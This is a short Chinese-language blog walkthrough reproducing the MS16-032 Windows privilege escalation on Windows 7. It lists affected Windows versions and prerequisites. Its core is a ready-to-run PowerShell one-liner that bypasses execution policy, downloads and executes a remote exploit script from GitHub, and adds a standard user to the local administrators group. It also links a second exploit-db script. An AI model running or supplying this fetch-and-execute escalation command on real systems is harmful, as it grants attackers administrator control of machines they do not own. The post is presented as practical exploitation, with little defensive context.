exploit-db的详情: https://www.exploit-db.com/exploits/39574/
复现参照的文章是不靠谱的谱
注意点:此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:
目标系统需要有2个以上的CPU核心
PowerShell v2.0及更高版本必须正在运行
此漏洞会影响以下Microsoft产品:
Windows Vista
Windows 7
Windows 8.1
Windows 10
Windows 2008 Server
Windows 2012 Server
复现测试的版本是Windows 7,其他的没有测试,可以自行进行测试;
漏洞测试
0x01使用标准用户登陆win7,下图是当前登录用户px的详细信息
1.png
0x02在powershell里面,直接执行命令进行提权,简单粗暴
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators px /add'"
2.jpg
0x03下面就是见证奇迹的时刻了
3.jpg
漏洞利用成功,有好几种方式,这只是其中一种。
下面也是一种权限提升的方式,简单写一下
脚本的下载下载地址:https://www.exploit-db.com/exploits/39719/
脚本的利用
1.jpg
2.png
6.jpg
5.png
网友评论